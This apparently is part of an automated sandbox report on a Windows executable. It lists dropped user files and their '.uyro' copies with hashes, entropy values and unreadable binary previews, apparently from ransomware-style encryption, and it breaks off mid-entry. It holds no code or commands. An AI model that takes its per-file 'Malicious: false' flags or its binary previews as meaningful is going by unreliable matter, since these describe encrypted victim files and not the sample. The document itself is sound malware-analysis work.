SHA-256:	D798C4149A381D9994E71495783D9F728CA189B715B75C87E007767B646B10A3
SHA-512:	0E17EB85B5E7016649A0323C275EE140647ED9CD8A2366426032EDDE65869A7BEB63D19176AD7AD990D1CECBD4B57EC43D681D34E5CA2DA97F559F515E74ADFD
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.Y..ul.h......I..(.[...~-...E..q.......!..+....Y.J...`F.}.C...Nf....^c%M..0;U..Q....q..E_C..7.1iI8....M.Z....g.'.......x\.q....i..o..`...!...A..jEv.Q......j.0.~^i.=.GeJ.?.._s.i....1.\|.}.~.O.PE.:.N.~.~e..p.N1_.....E..i ....P......O64.P..K.gp......."......2..n.(n...;...?..v@...i@u]g..N}...W.C..&tj.Fp..B0.`.....]..i.N#..$E.t........'.t(.+.f..l.^.E..d....,8f{.......Tg...-.&#7.._.rK.L.Ww.h.....9."..b..y%........et...~....\nu...6/p..D......@~XI....2m)./....+.sR.c..yI.@;.+..g.G..P..J....`.......x..v\|..S.R..^....B...t....C.k...t.....X'%. }......0w..k.1..;...N;P.c..E..Y...\=.hz..N.0R-.A..2l._....).#jv.<6(".......%......iN.5...R.7./5E.XN^G........D....}E.hN~.[.....5:yj.()o...>..tL....<.Yt..jW\|.@~.......d...9....~C(.a.{7.^.m..9;.s7.A.....c@..&.BX.Y~\....Mw.$9..9..'....)..s.....%........c...W;-..Q.........!..m;.e...U.....n.l%!.OR.D.%..tPZ..KQAL;.K..s.>z..v.B.@.Iq./.._.....H.W.]u...T.T&.$....Fm0.Z..[D.Z;V......V.gslM..Q.....'.........nqf.3...FC.VL.

C:\Users\user\Documents\KZWFNRXYKI\KZWFNRXYKI.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855637771303948
Encrypted:	false
SSDEEP:	24:wWJw3HEBiGtWNCy3Vs/B1yQTkXEK0hprXWybD:3CQikd/B0QTk09pjPD
MD5:	1FA61324D950021650F66389AE01CB23
SHA1:	24C1E1D55E04F331A951254EB8326FD3CF536093
SHA-256:	D798C4149A381D9994E71495783D9F728CA189B715B75C87E007767B646B10A3
SHA-512:	0E17EB85B5E7016649A0323C275EE140647ED9CD8A2366426032EDDE65869A7BEB63D19176AD7AD990D1CECBD4B57EC43D681D34E5CA2DA97F559F515E74ADFD
Malicious:	false
Reputation:	unknown
Preview:	KZWFN.Y..ul.h......I..(.[...~-...E..q.......!..+....Y.J...`F.}.C...Nf....^c%M..0;U..Q....q..E_C..7.1iI8....M.Z....g.'.......x\.q....i..o..`...!...A..jEv.Q......j.0.~^i.=.GeJ.?.._s.i....1.\|.}.~.O.PE.:.N.~.~e..p.N1_.....E..i ....P......O64.P..K.gp......."......2..n.(n...;...?..v@...i@u]g..N}...W.C..&tj.Fp..B0.`.....]..i.N#..$E.t........'.t(.+.f..l.^.E..d....,8f{.......Tg...-.&#7.._.rK.L.Ww.h.....9."..b..y%........et...~....\nu...6/p..D......@~XI....2m)./....+.sR.c..yI.@;.+..g.G..P..J....`.......x..v\|..S.R..^....B...t....C.k...t.....X'%. }......0w..k.1..;...N;P.c..E..Y...\=.hz..N.0R-.A..2l._....).#jv.<6(".......%......iN.5...R.7./5E.XN^G........D....}E.hN~.[.....5:yj.()o...>..tL....<.Yt..jW\|.@~.......d...9....~C(.a.{7.^.m..9;.s7.A.....c@..&.BX.Y~\....Mw.$9..9..'....)..s.....%........c...W;-..Q.........!..m;.e...U.....n.l%!.OR.D.%..tPZ..KQAL;.K..s.>z..v.B.@.Iq./.._.....H.W.]u...T.T&.$....Fm0.Z..[D.Z;V......V.gslM..Q.....'.........nqf.3...FC.VL.

C:\Users\user\Documents\KZWFNRXYKI\NEBFQQYWPS.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856233272150246
Encrypted:	false
SSDEEP:	24:7hqLR81WL2Y0eHzP9ZfEGROkTos3CwwXZmwcG8fzg5R45KyonkQEnezqbD:7ALK1WiYfhY4Chm68fYyCUD
MD5:	D18F8E07E236D2349CBAB2F69E1DB48D
SHA1:	D588D6FEB2AD1214B4C2E05E3ED2201BB8335A91
SHA-256:	EACCFE57752252F5548FB07028B68D50929B154A00EAB5B10195047FF5F79AC1
SHA-512:	60F63A78D2D9E90B9537DA7BB18250CA61CE3C78B51109B54639E417F5CC7B960EDE87C64D971E153C1F39892150F3F8AF5F5201C7E9689675D1750CCBC43694
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ.[J.m..6.............LocB@.N.Zb.x_O..R6..rqh$Q& ....9u.Ou..........0n..D..+.....Q.B....%..T...S.\1..s.%..z.X..n.vp......`.Z&d......0..'C...Vr...r.<...y......xqi.....\=......WF.j........e....z.......t..J.,...PYc.."N.HC/Q.[..<...p...ZpD....;3.....v..7..I.Z.`/:..-.M..-l.Ri.o..&..eISD..D.......p.8H@j...)c...........U......)..Z.IU.P+jA...M_...}.n.....t![.eK...>..D.:.C.y/7..j..D@.Z......u..G...lGK.1.\|.......]....]5.\...=.Aib+....F.[z%..."_.wI...l.X........j.H.g.. ".u-.pf..U8.<UI=.P=u..>.v.u ....Becr...8Z.d.b3y.7..w\|......,0U..........U....C....].yV..<.x.q....*a$6N9N$.r..'f:.w_.'<......z.'Pa.O.?.6}:..`..;f.%......u]6.....V...K)2......;h`.>J.....d...m...A.N...7.H......)..Y0..FW..n....,.i...A.aj..[...L...X@....2.t.8....M^. .\..@.r....B.x....6..g.I..?.f.-.S.0~-o.y....u9khs.^............m.#....X....t...._i;......f.%..\Z....".^..+..).l.5.)..4...d......E.....8.w}.....qK..r.I0sp....'z..x..4..z......w.^.....l.h:.:..[~.%F'9.B(.S......9$qn.ui.$....y1"....U

C:\Users\user\Documents\KZWFNRXYKI\NEBFQQYWPS.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856233272150246
Encrypted:	false
SSDEEP:	24:7hqLR81WL2Y0eHzP9ZfEGROkTos3CwwXZmwcG8fzg5R45KyonkQEnezqbD:7ALK1WiYfhY4Chm68fYyCUD
MD5:	D18F8E07E236D2349CBAB2F69E1DB48D
SHA1:	D588D6FEB2AD1214B4C2E05E3ED2201BB8335A91
SHA-256:	EACCFE57752252F5548FB07028B68D50929B154A00EAB5B10195047FF5F79AC1
SHA-512:	60F63A78D2D9E90B9537DA7BB18250CA61CE3C78B51109B54639E417F5CC7B960EDE87C64D971E153C1F39892150F3F8AF5F5201C7E9689675D1750CCBC43694
Malicious:	false
Reputation:	unknown
Preview:	NEBFQ.[J.m..6.............LocB@.N.Zb.x_O..R6..rqh$Q& ....9u.Ou..........0n..D..+.....Q.B....%..T...S.\1..s.%..z.X..n.vp......`.Z&d......0..'C...Vr...r.<...y......xqi.....\=......WF.j........e....z.......t..J.,...PYc.."N.HC/Q.[..<...p...ZpD....;3.....v..7..I.Z.`/:..-.M..-l.Ri.o..&..eISD..D.......p.8H@j...)c...........U......)..Z.IU.P+jA...M_...}.n.....t![.eK...>..D.:.C.y/7..j..D@.Z......u..G...lGK.1.\|.......]....]5.\...=.Aib+....F.[z%..."_.wI...l.X........j.H.g.. ".u-.pf..U8.<UI=.P=u..>.v.u ....Becr...8Z.d.b3y.7..w\|......,0U..........U....C....].yV..<.x.q....*a$6N9N$.r..'f:.w_.'<......z.'Pa.O.?.6}:..`..;f.%......u]6.....V...K)2......;h`.>J.....d...m...A.N...7.H......)..Y0..FW..n....,.i...A.aj..[...L...X@....2.t.8....M^. .\..@.r....B.x....6..g.I..?.f.-.S.0~-o.y....u9khs.^............m.#....X....t...._i;......f.%..\Z....".^..+..).l.5.)..4...d......E.....8.w}.....qK..r.I0sp....'z..x..4..z......w.^.....l.h:.:..[~.%F'9.B(.S......9$qn.ui.$....y1"....U

C:\Users\user\Documents\KZWFNRXYKI\QNCYCDFIJJ.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.877274481058303
Encrypted:	false
SSDEEP:	24:Sk/9EVhHyXcV5TEi/AWnLuD6K5YQ94UhH81Yjgb2BWyvqbD:v2VEXcVei/A8qD6S94yss/WTD
MD5:	F8B5366988101D752E234410D41A974E
SHA1:	5EC4C1575E4969BF2918BBCC68F382D7812A4326
SHA-256:	587603962CE3080EB7987D0DD3EA140C6EB6B754BAF04017CEC1D5EF5D3C005F
SHA-512:	C960416E5E3247426F01BADA5A75A9693F1EC0B3737DF7A80AFA5B9412CC7072D937C76C987A68824AD797E3C16F30AD68D3F3490372B8AAC79B66037C76BB83
Malicious:	false
Reputation:	unknown
Preview:	QNCYCFr.7.'$..8.O..b.......R...ZDZ..I.......,h..........Y._......_Q.Q~..j..J...x.<o...RN..~.....O..........3...!.R(...[........S.Z...Z..=..0=.~...CY..} i..2...1..L?.....vb.....q....EP..)..2..xyVZ...~Z.#.../..%.Zfhh3..::.qmA.X.T..........x\|4.^..!%....V.. ,...@2.i...N...EGro-.8!.nw.K+.S..Z...p.o...Q...j....\|.~.}.2.M/7.';yF..x.......#/..[.L..zb......R\..~.$..++y.W-~t....).8.$......CRW.w.WB.....m,..VU.F........z..R..Q......,."......?U..)...@4........C..W".. J.].c6G...=..?....=..Q...cO].?..HR...G@.t..2.....X._.."i...p...W...O...T..g....p..[.M.I...qcT....a...[./(.@w..d.,m..9.#\|.....>Ed. ..../......D..0.'.]....k...._OL..}>"7.\|.`.K..............\|Z.a...\|l.p...........U..r.S..>y.q!......./+.......+.Zl.X.M.fL..B..\|%.N.A..i.._;wna.e.X.!F"[Hb..a........q....Y/.....]..........AP..i....`<.7....K..............I.:..4^....!$.p.....E.?.t.>i..L...;^.7j.n.@..g.3..X.d.K.t..yJ'P.2].%\|.<.o.qK.2...lD.qH..m5.[.e.9.O&....S....]..u8\|.6p..r;G.t...e..6X._V{q.B.........lU!.H

C:\Users\user\Documents\KZWFNRXYKI\QNCYCDFIJJ.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.877274481058303
Encrypted:	false
SSDEEP:	24:Sk/9EVhHyXcV5TEi/AWnLuD6K5YQ94UhH81Yjgb2BWyvqbD:v2VEXcVei/A8qD6S94yss/WTD
MD5:	F8B5366988101D752E234410D41A974E
SHA1:	5EC4C1575E4969BF2918BBCC68F382D7812A4326
SHA-256:	587603962CE3080EB7987D0DD3EA140C6EB6B754BAF04017CEC1D5EF5D3C005F
SHA-512:	C960416E5E3247426F01BADA5A75A9693F1EC0B3737DF7A80AFA5B9412CC7072D937C76C987A68824AD797E3C16F30AD68D3F3490372B8AAC79B66037C76BB83
Malicious:	false
Reputation:	unknown
Preview:	QNCYCFr.7.'$..8.O..b.......R...ZDZ..I.......,h..........Y._......_Q.Q~..j..J...x.<o...RN..~.....O..........3...!.R(...[........S.Z...Z..=..0=.~...CY..} i..2...1..L?.....vb.....q....EP..)..2..xyVZ...~Z.#.../..%.Zfhh3..::.qmA.X.T..........x\|4.^..!%....V.. ,...@2.i...N...EGro-.8!.nw.K+.S..Z...p.o...Q...j....\|.~.}.2.M/7.';yF..x.......#/..[.L..zb......R\..~.$..++y.W-~t....).8.$......CRW.w.WB.....m,..VU.F........z..R..Q......,."......?U..)...@4........C..W".. J.].c6G...=..?....=..Q...cO].?..HR...G@.t..2.....X._.."i...p...W...O...T..g....p..[.M.I...qcT....a...[./(.@w..d.,m..9.#\|.....>Ed. ..../......D..0.'.]....k...._OL..}>"7.\|.`.K..............\|Z.a...\|l.p...........U..r.S..>y.q!......./+.......+.Zl.X.M.fL..B..\|%.N.A..i.._;wna.e.X.!F"[Hb..a........q....Y/.....]..........AP..i....`<.7....K..............I.:..4^....!$.p.....E.?.t.>i..L...;^.7j.n.@..g.3..X.d.K.t..yJ'P.2].%\|.<.o.qK.2...lD.qH..m5.[.e.9.O&....S....]..u8\|.6p..r;G.t...e..6X._V{q.B.........lU!.H

C:\Users\user\Documents\KZWFNRXYKI\UOOJJOZIRH.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850540093263856
Encrypted:	false
SSDEEP:	24:TLqOAyjfIseJhMiq7VLp6xfiD/eh5MtgMjWo9/HKrLTnSOb1QsrpbD:yezeJg7rIW/ectnHZqLSOJD
MD5:	707807E604AA7B7C20E5E67F581DB9D3
SHA1:	1E632A695D9CAD1272D06DF634587ACC7ECBEA91
SHA-256:	AA1AD9EF0098CEAEBEC6AA28F7202B0C490DABB95C0FF5B2C17887E22D4D7312
SHA-512:	A48BF02C22B1FB750D641D3E41318DCE1AFB432B2F1BD79A9D4855000CAFC9BECBA9BFCB9DFA7673E9F96C154575C4A1B72EADD0E95E5082ED161533A143C99C
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ.O.W-h\|&...e."!.@.....,.k.....A.g$j<).Y..e[+.....d..,.N.....\. R.u..VPp....[U.Q.(.4.,8@....?...w.;...on.....c%.!............x.e...e.q....y.T.d..D_.....+...:0....?D..'......B.g....e../.Y.$/..G.e...W~.d...WT.~.7.. . ..3=..=.)..i..Qh.N-b?.....gw..#8.J59o....t...N..m1_r%..-..;kH..T..ejz.....p..K...H...S....@....'.j.U...[..)...Q[.-...KwM...:v?.....<C.....jaE..6V......&.....Zy....l.....g..tc...j.s.V.C\..o....f.<d1.[#K..f$oP..s.\|../....^.g&..j. .En.5.4..~.3W.N..X...[.k...R...R..9zK...Q.._.\|.2...#.e...s!7]5.Y)..$..hPl..3ND.W.:....M.5E....\|.%....c~\|.j.dd.f.J........j..'..a....V46..4g..p/.....}.P...>...>.OD.<v"...T..u..@....1...j.J@.r^.].iG5....o.JS......".R(...........$/3).K.V.+..p=.g?.)%n<9.;e...._.].S8V..>V...>]a.p...o.....&$...%..;d....T&.t..R.\|....y.&.o;TT....o7...-.....~.....o....US@.wI....9.......j..=._....V...+..Z..-.d..&...9....{....+}7R.G.<...?.~..[...^...B.W...kF.Kr.6...t-...5.]..m./.NqR..zqlc4....x."..... a.d?fi.

C:\Users\user\Documents\KZWFNRXYKI\UOOJJOZIRH.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850540093263856
Encrypted:	false
SSDEEP:	24:TLqOAyjfIseJhMiq7VLp6xfiD/eh5MtgMjWo9/HKrLTnSOb1QsrpbD:yezeJg7rIW/ectnHZqLSOJD
MD5:	707807E604AA7B7C20E5E67F581DB9D3
SHA1:	1E632A695D9CAD1272D06DF634587ACC7ECBEA91
SHA-256:	AA1AD9EF0098CEAEBEC6AA28F7202B0C490DABB95C0FF5B2C17887E22D4D7312
SHA-512:	A48BF02C22B1FB750D641D3E41318DCE1AFB432B2F1BD79A9D4855000CAFC9BECBA9BFCB9DFA7673E9F96C154575C4A1B72EADD0E95E5082ED161533A143C99C
Malicious:	false
Reputation:	unknown
Preview:	UOOJJ.O.W-h\|&...e."!.@.....,.k.....A.g$j<).Y..e[+.....d..,.N.....\. R.u..VPp....[U.Q.(.4.,8@....?...w.;...on.....c%.!............x.e...e.q....y.T.d..D_.....+...:0....?D..'......B.g....e../.Y.$/..G.e...W~.d...WT.~.7.. . ..3=..=.)..i..Qh.N-b?.....gw..#8.J59o....t...N..m1_r%..-..;kH..T..ejz.....p..K...H...S....@....'.j.U...[..)...Q[.-...KwM...:v?.....<C.....jaE..6V......&.....Zy....l.....g..tc...j.s.V.C\..o....f.<d1.[#K..f$oP..s.\|../....^.g&..j. .En.5.4..~.3W.N..X...[.k...R...R..9zK...Q.._.\|.2...#.e...s!7]5.Y)..$..hPl..3ND.W.:....M.5E....\|.%....c~\|.j.dd.f.J........j..'..a....V46..4g..p/.....}.P...>...>.OD.<v"...T..u..@....1...j.J@.r^.].iG5....o.JS......".R(...........$/3).K.V.+..p=.g?.)%n<9.;e...._.].S8V..>V...>]a.p...o.....&$...%..;d....T&.t..R.\|....y.&.o;TT....o7...-.....~.....o....US@.wI....9.......j..=._....V...+..Z..-.d..&...9....{....+}7R.G.<...?.~..[...^...B.W...kF.Kr.6...t-...5.]..m./.NqR..zqlc4....x."..... a.d?fi.

C:\Users\user\Documents\KZWFNRXYKI\WKXEWIOTXI.pdf

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851766622022533
Encrypted:	false
SSDEEP:	24:TpD2EzGUrIxTcr1us+eKT6zgmOZ56fgyDkn1hszK/oD9bD:Tpqlmfust0bSP1QoD9D
MD5:	412F4BD299F88015682082B570B0A78E
SHA1:	69C68449AB4C491FD55C5E7BCAD6848B39181ED9
SHA-256:	BF72D0BD4629AEE119AC245E25EF0D2F6916DCBD8E939CDC764627961AC7287C
SHA-512:	A38C3DB04D63A20CAB8C365D2140F329C4F959A1BE61597637512F6800BC6C5DC8AE6BD76E50ED30B786B07738757FB343EFC5C7B00ECF80B773557C791CAA42
Malicious:	false
Reputation:	unknown
Preview:	WKXEW..l!.......K....#...o8.'.......w......N.e{.m.!......e2..........H.......~..j... ..m...z....1...X..8.....z....Oa.R.z.m..l.I.."!l.B..T#.g.5.@w%-.}...p...._..t%.......@^....#.p.......}.>.q.z...[q...[...jc..K&..Am..}.?.........e...Gb.....A..(dJ.o...b..o..{..o..WE.......h.]._.Ga.&t..}...^..f:...U..........O.c.W.cx-D..Ew...&....n~5E.......K.}..W...Q.a..i'Sz..R:....D.:.z.......7.3...(........TF......X#.w..-.....>.H.../L....2`.d....$..h.j.C.tY...K.....k. \|.@....6n..O*..&.B....^f2....n..Q7.#.v#.M......k.W.../.n...=..Q...5...;.g..\|....5...8.....[.:u...hF..q0.m.8~]P.W.... .-..%....x...t)X..c$R....g.S.p.=.......;3.....#.,\.\|.F.W.........B.#..j..b.s..`.^.q..Z..aB.u5Y....\G...).s.....0J......H..Et;V3.`\.......0..C..OGM(Qk..W.(IN.....40.........A\d....>.$.....A..+......T}..{...ps..>.8...y.b..\.......Q(s.?.B.......M..I../~(.j"...f..0..+.\|{.G.....[...S..p.y&.....\.o.@?..T.<....2.......K..}..w.F....f........A.. .@...P~....@N../.:^...2.v....I.O...

C:\Users\user\Documents\KZWFNRXYKI\WKXEWIOTXI.pdf.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851766622022533
Encrypted:	false
SSDEEP:	24:TpD2EzGUrIxTcr1us+eKT6zgmOZ56fgyDkn1hszK/oD9bD:Tpqlmfust0bSP1QoD9D
MD5:	412F4BD299F88015682082B570B0A78E
SHA1:	69C68449AB4C491FD55C5E7BCAD6848B39181ED9
SHA-256:	BF72D0BD4629AEE119AC245E25EF0D2F6916DCBD8E939CDC764627961AC7287C
SHA-512:	A38C3DB04D63A20CAB8C365D2140F329C4F959A1BE61597637512F6800BC6C5DC8AE6BD76E50ED30B786B07738757FB343EFC5C7B00ECF80B773557C791CAA42
Malicious:	false
Reputation:	unknown
Preview:	WKXEW..l!.......K....#...o8.'.......w......N.e{.m.!......e2..........H.......~..j... ..m...z....1...X..8.....z....Oa.R.z.m..l.I.."!l.B..T#.g.5.@w%-.}...p...._..t%.......@^....#.p.......}.>.q.z...[q...[...jc..K&..Am..}.?.........e...Gb.....A..(dJ.o...b..o..{..o..WE.......h.]._.Ga.&t..}...^..f:...U..........O.c.W.cx-D..Ew...&....n~5E.......K.}..W...Q.a..i'Sz..R:....D.:.z.......7.3...(........TF......X#.w..-.....>.H.../L....2`.d....$..h.j.C.tY...K.....k. \|.@....6n..O*..&.B....^f2....n..Q7.#.v#.M......k.W.../.n...=..Q...5...;.g..\|....5...8.....[.:u...hF..q0.m.8~]P.W.... .-..%....x...t)X..c$R....g.S.p.=.......;3.....#.,\.\|.F.W.........B.#..j..b.s..`.^.q..Z..aB.u5Y....\G...).s.....0J......H..Et;V3.`\.......0..C..OGM(Qk..W.(IN.....40.........A\d....>.$.....A..+......T}..{...ps..>.8...y.b..\.......Q(s.?.B.......M..I../~(.j"...f..0..+.\|{.G.....[...S..p.y&.....\.o.@?..T.<....2.......K..}..w.F....f........A.. .@...P~....@N../.:^...2.v....I.O...

C:\Users\user\Documents\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826192747390614
Encrypted:	false
SSDEEP:	24:YFxGvn7KBP2JTZyfY3YNL+vCdtVFiJgC6h8nRbUDvc41f9PNJJw1RbD:YivcOhgw3eL+qIgnhuRUDvZhRJw1BD
MD5:	4F4393901EDAB2C9B329E038EED6D2BE
SHA1:	65E82397314DF6A4EA37A973E8AC495E4FB6E70E
SHA-256:	74B930861755F70C2591C69BDE52DABC2E40990C83451CC072D4D484E4FD1C94
SHA-512:	8D042881AD8D6C22886E21DCA635AE322E153699902969CBA0FFF4D78DE423A8C39B9A4436EFC72C6D8AF7A2FC84E420AFEB13E82C40914B9058DE9ADA0643DF
Malicious:	false
Reputation:	unknown
Preview:	LTKMY].R.JTH"..$.cg.........s...qj.S..I.fU.......f.(e..[....N......#....L..?...b.O....'y.....1...H....p.-...5.P'k....-D6.o...........0 ..8lN..r.Z....Y.......!+..9U.._.Jrw...7.Ak....T....m.c..g.....3...c...J...>P...l.e..\|.)h...CL.O..........p.,"U..?..0..\|..xnl.\|...b.........F.0..iQO)<.eG.4.B. ....6.Y..5DT.i..c..Ae.,..\}...UU. .Q...U.:kv@.)..m..)..;z......J.9.&i.C....x..f_f$..2.e....\.\|..nQ...8.r.N..dC.E...v"........W.U;.....I8...<..;.-.^.]d..C.Hq..S...;H.W.....8..!..n...F...Mi..a3...Q5fy.`.....>..9."..\|.'7..\...F:().x'.X.D.>..8.w..n&...!E.o...jo3...g..b.n.}...!..].{.G.."bnk.......6A!C.W".....H..`.93...gC...X.~sC..@...Q..~...V..6q..g../.kae.JX.a.q.Wt.)...?.P....SB<.A....7.&~.>.....qeCLy.q..{m.3.w..y..T.........l=.C.8*,5dAr...t[...D......Ps.jy/........v\|...Q...\.oP.ni`...../...v.......PuZ......r.f.....y-.NZK5I...:r=F..B..p...R........}..q.iF.....!.6U.5Y..JH.?b....m?.l/..... ...t\|...Vn2f........_$..0S.t".n.3n.$..q..i;..w.C..2.o...Q..k]..6....

C:\Users\user\Documents\LTKMYBSEYZ.docx.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.826192747390614
Encrypted:	false
SSDEEP:	24:YFxGvn7KBP2JTZyfY3YNL+vCdtVFiJgC6h8nRbUDvc41f9PNJJw1RbD:YivcOhgw3eL+qIgnhuRUDvZhRJw1BD
MD5:	4F4393901EDAB2C9B329E038EED6D2BE
SHA1:	65E82397314DF6A4EA37A973E8AC495E4FB6E70E
SHA-256:	74B930861755F70C2591C69BDE52DABC2E40990C83451CC072D4D484E4FD1C94
SHA-512:	8D042881AD8D6C22886E21DCA635AE322E153699902969CBA0FFF4D78DE423A8C39B9A4436EFC72C6D8AF7A2FC84E420AFEB13E82C40914B9058DE9ADA0643DF
Malicious:	false
Reputation:	unknown
Preview:	LTKMY].R.JTH"..$.cg.........s...qj.S..I.fU.......f.(e..[....N......#....L..?...b.O....'y.....1...H....p.-...5.P'k....-D6.o...........0 ..8lN..r.Z....Y.......!+..9U.._.Jrw...7.Ak....T....m.c..g.....3...c...J...>P...l.e..\|.)h...CL.O..........p.,"U..?..0..\|..xnl.\|...b.........F.0..iQO)<.eG.4.B. ....6.Y..5DT.i..c..Ae.,..\}...UU. .Q...U.:kv@.)..m..)..;z......J.9.&i.C....x..f_f$..2.e....\.\|..nQ...8.r.N..dC.E...v"........W.U;.....I8...<..;.-.^.]d..C.Hq..S...;H.W.....8..!..n...F...Mi..a3...Q5fy.`.....>..9."..\|.'7..\...F:().x'.X.D.>..8.w..n&...!E.o...jo3...g..b.n.}...!..].{.G.."bnk.......6A!C.W".....H..`.93...gC...X.~sC..@...Q..~...V..6q..g../.kae.JX.a.q.Wt.)...?.P....SB<.A....7.&~.>.....qeCLy.q..{m.3.w..y..T.........l=.C.8*,5dAr...t[...D......Ps.jy/........v\|...Q...\.oP.ni`...../...v.......PuZ......r.f.....y-.NZK5I...:r=F..B..p...R........}..q.iF.....!.6U.5Y..JH.?b....m?.l/..... ...t\|...Vn2f........_$..0S.t".n.3n.$..q..i;..w.C..2.o...Q..k]..6....

C:\Users\user\Documents\LTKMYBSEYZ\JSDNGYCOWY.mp3

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830397580574634
Encrypted:	false
SSDEEP:	24:47ZiI7hQsTeFAjPIzrVNZ6gZWZjyk3H2yrTWRYMC5YHbIhGyw28XBbD:nIVQPAjPgxz6WWZjLGlTmkIhGDFXRD
MD5:	0EB074DE3377306575C0FEC0DAE8E464
SHA1:	79C3BFE601E53A66FF429456E83FADCDB2161316
SHA-256:	680242343800FE375447BF0981C0CD9CE732E2C3FB86D9E9E7192CF794D560C6
SHA-512:	00AD94F1ABCF56F72E99D8907A59F66D321BEA70A132D233FE9B057715B09F79950C6DF8A0CA456AC58A621CBF6B2481773A0E6C9BD4C07CBC1F412CCE231B07
Malicious:	false
Reputation:	unknown
Preview:	JSDNG'{.Z......(.na0.$.o.....-....zR..D....C...oL.wf._.6(0...Y..C....c....!gj=F.p.bO..v..D<..f,.Y..X..G..rZ.=..I.. ...}u...V..U.%.../.....bh.Gs..!.....x.9~.8.... .D..^.XDyfQ.!...w.i...`t.Ox.....$......>o_..\.:.....1....t...S...D.7uCZ..u>...W..a.U..4..E..E..%Y.6..=.._5.R.7....m.g..x..?.....t.r.........9..J...."L.%...,.r.c....pX.Y.B.....S.i.8.m..H\...HQ~..k.m}.....QaHD......W.p...}.m..i.7.....#.....0...y.iw.N{B.-.JBX3..."... "aa..r.jpf..(.m}y.9.%.....B.j...........6......t.D...l..88OQs.='E.:...t.\|........hN..v.Jp._...E[t.2..m..?VF`;A...'.._.Q.F..t6.(h.$.L.3.GE.%....l.TQ).^.%h.r..:...M..~...(R..]-z.."o..o.s.]).6l9w......_p.^".PJ.SB9c#%M4.?H..!`...Q.e.q...g....n.`....h..C.a..........F.K...v...Lk.rsB/..<..F^O.ON..l_=.s=..K....]..7.5.+...k5......4.~......=.".,...J.....z=.G.Y....{..~........S...I.I......&SD+d..aM.H%.H.6H...Z!...sQ5...=\|.=1..a.xKN........S.8.......v>..".Z..@.....S.y.../.?...!..j5{j.h.....&.....R..G...e.k..2P].*.....}.....

C:\Users\user\Documents\LTKMYBSEYZ\JSDNGYCOWY.mp3.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830397580574634
Encrypted:	false
SSDEEP:	24:47ZiI7hQsTeFAjPIzrVNZ6gZWZjyk3H2yrTWRYMC5YHbIhGyw28XBbD:nIVQPAjPgxz6WWZjLGlTmkIhGDFXRD
MD5:	0EB074DE3377306575C0FEC0DAE8E464
SHA1:	79C3BFE601E53A66FF429456E83FADCDB2161316
SHA-256:	680242343800FE375447BF0981C0CD9CE732E2C3FB86D9E9E7192CF794D560C6
SHA-512:	00AD94F1ABCF56F72E99D8907A59F66D321BEA70A132D233FE9B057715B09F79950C6DF8A0CA456AC58A621CBF6B2481773A0E6C9BD4C07CBC1F412CCE231B07
Malicious:	false
Reputation:	unknown
Preview:	JSDNG'{.Z......(.na0.$.o.....-....zR..D....C...oL.wf._.6(0...Y..C....c....!gj=F.p.bO..v..D<..f,.Y..X..G..rZ.=..I.. ...}u...V..U.%.../.....bh.Gs..!.....x.9~.8.... .D..^.XDyfQ.!...w.i...`t.Ox.....$......>o_..\.:.....1....t...S...D.7uCZ..u>...W..a.U..4..E..E..%Y.6..=.._5.R.7....m.g..x..?.....t.r.........9..J...."L.%...,.r.c....pX.Y.B.....S.i.8.m..H\...HQ~..k.m}.....QaHD......W.p...}.m..i.7.....#.....0...y.iw.N{B.-.JBX3..."... "aa..r.jpf..(.m}y.9.%.....B.j...........6......t.D...l..88OQs.='E.:...t.\|........hN..v.Jp._...E[t.2..m..?VF`;A...'.._.Q.F..t6.(h.$.L.3.GE.%....l.TQ).^.%h.r..:...M..~...(R..]-z.."o..o.s.]).6l9w......_p.^".PJ.SB9c#%M4.?H..!`...Q.e.q...g....n.`....h..C.a..........F.K...v...Lk.rsB/..<..F^O.ON..l_=.s=..K....]..7.5.+...k5......4.~......=.".,...J.....z=.G.Y....{..~........S...I.I......&SD+d..aM.H%.H.6H...Z!...sQ5...=\|.=1..a.xKN........S.8.......v>..".Z..@.....S.y.../.?...!..j5{j.h.....&.....R..G...e.k..2P].*.....}.....

C:\Users\user\Documents\LTKMYBSEYZ\KZWFNRXYKI.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856528994696251
Encrypted:	false
SSDEEP:	24:0fFSS46zXNBQao9ZEFkUbWUoDhrYOOVUmLgPLgR6x2ucKD9ubD:1f0abSkUbWUaSV5YxrhJMD
MD5:	4B048357BD819BEB6470F00B15A385EF
